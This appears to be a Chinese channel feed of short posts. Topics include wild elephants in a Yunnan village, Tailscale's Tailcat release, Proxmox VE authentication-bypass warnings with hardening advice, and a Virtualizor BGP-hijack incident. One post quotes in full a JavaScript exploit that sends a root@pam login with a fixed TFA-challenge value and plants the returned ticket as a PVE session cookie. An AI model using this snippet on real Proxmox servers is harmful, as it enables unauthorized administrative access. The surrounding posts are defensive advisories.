劲爆大象部落
今天abc看了啥🤔

分享央视新闻的微博:#深夜门口站满了大象#【#云南一村庄夜里来了50头大象#】近日,在云南西双版纳磨憨镇尚勇村,50头野生亚洲象深夜进村觅食休憩。不少本地村民表示,近20年来从未见过规模如此庞大的野象群。当地立刻启动应急预警,借助无人机全程追踪象群动态。本次象群性情温顺,未冲撞民居、滋扰村民。8月2... https://weibo.com/2656274875/Rg2RW1KZl (来自Share微博客户端)
Tailscale开源Tailcat:不登录不配IP,两台机器直接开隧道
Tailscale 开源了 Tailcat。两台机器不用注册账号,也不用加入同一个 Tailnet,拿到一串地址就能直接连起来。它继续使用 Tailscale 的 WireGuard 加密、NAT 穿透和 DERP 中继,但不需要 Tailscale 的账号和控制面。
一台机器运行 Tailcat,就会生成一串连接地址。把地址发给另一台机器,就能传文件、转发端口或者 SSH。连接会先通过 DERP 找到对方,再尝试直接建立点对点 UDP 连接;打洞失败,流量才继续走 DERP 中继。整个过程都在用户空间完成,不改系统路由和 DNS。
Tailscale 首席工程师 Brad Fitzpatrick 早在 2023 年就做出了 Tailcat 原型,后来基本搁置。最近 AI Agent 开始大量连接沙箱、远程 VM 和测试机器,他又把这个项目捡了回来。他用 Tailcat 让 Agent 临时连接树莓派、EC2 和 Windows 主机,不用先给 Agent 配账号和网络。
Tailcat 也不是完整 Tailscale 的替代品。它没有用户身份、权限策略和设备管理,连接地址本身要像密码一样保管。Tailscale 托管的 Tailcat DERP 中继会记录元数据,而且限速、没有在线率 SLA;需要更稳定或更私密,可以自己部署 DERP。
信源
动察 Beating 频道 · 动察 Beating 交流群
此漏洞已分配编号 PSA-2026-00043-1
确认受影响版本: >= 7.0-7 & <8.0.4 (截止今日均已 EOL), 仍然建议更新到 PVE 9
*如果你在 PVE WebUI 中配置了用户的 TFA,就不受此漏洞影响
https://forum.proxmox.com/threads/proxmox-virtual-environment-security-advisories.149331/page-4#post-867929
Update: 由于 PVE 7.x 已 EOL,因此对应版本的 Exploit 已提前发布(确认可完整绕过 WebUI 认证),8.x/9.x 则被作者声明为 “暂时不受影响”
无论如何,尽快参考 最佳实践 加固你所有对外开放的敏感服务!
Exp (.js) 正文:// PVE 7.4 auth-bypass @NebuSec 2026 // First, make sure to try logging in as root with this exact password: root@pam (async () => { const form = new URLSearchParams({ username: "root@pam", password: "root@pam", "tfa-challenge": "NEBUSEC-CHALLENGE", }); const loginResponse = await fetch("/api2/json/access/ticket", { method: "POST", credentials: "omit", headers: { "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8" }, body: form, }); const loginBody = await loginResponse.json(); document.cookie = `PVEAuthCookie=${loginBody?.data?.ticket}; Path=/; Secure; SameSite=Strict`; location.reload() })();
观后感:不是,你就这么水灵灵的拿到 login cookie 了?
https://fixupx.com/nebusecurity/status/2094719919539793989


草,原来 9.1 一堆机器官方定价直接涨了......
https://www.ithome.com/0/996/694.htm
#风险预警
本频道从多信源整理, PVE WebUI 近期极有可能已出现严重 RCE 0day 安全漏洞 (并已出现在野利用报告),从 PVE7 (已 EOL, 建议立即更新) 到 PVE8 (已知报告版本: 8.0.3 / 8.2 / 8.4) 全系列均已被攻破,可绕过身份验证。操作建议:
1) 立即停止将任何 PVE WebUI / WebAPI (8006) / SSH 直接暴露公网;
2) 如一定需要暴露公网,也尽可能利用 VPN (e.g. Tailscale) / SD-WAN / Cloudflare Zero-Trust (One) 为 PVE WebUI 增加二层防护 (或者最简单的: 加个 basic auth);在 sshd config 中也禁止使用密码登录;
3) 哪怕 PVE 仅部署在内网,也请配置好 IP-ACL Rule;
4) PVE <=8 已正式 EOL,无论如何都请更新到 PVE 9;
5) 非常建议 PVE9 也采取以上安全措施建议;
6) 近期在运维时需要投入更多精力关注 PVE 相关补丁更新。
refs: PVE7 report | PVE 8.0.3/8.2/8.4 report
https://www.virtualizor.com/blog/security-incident-bgp-hijacking/
2026年8月28日至30日期间,Softaculous 位于 Hetzner 的基础设施遭遇了严重的 BGP 劫持攻击,攻击者将大量官方流量重定向至其控制的恶意服务器,并利用骗取的合法 TLS 证书实现了无安全警告的拦截,这导致部分 Virtualizor 服务器在更新时被植入了恶意软件包,且在此期间登录客户区或操作账单的用户也面临着账户密码泄露的风险。
目前网络路由已全面恢复正常,官方紧急呼吁所有系统管理员立即排查服务器中是否存在特定的入侵指标(如java-jre-update.service文件),并立刻重置客户区密码、API 密钥以及审计服务器安全以消除隐患。
仅剩85500ml
回收价202=2块钱现金+200蚂蚁森林能量
https://www.bilibili.com/video/BV1enhA65ExJ/
几分钟前,看上去现在恢复了
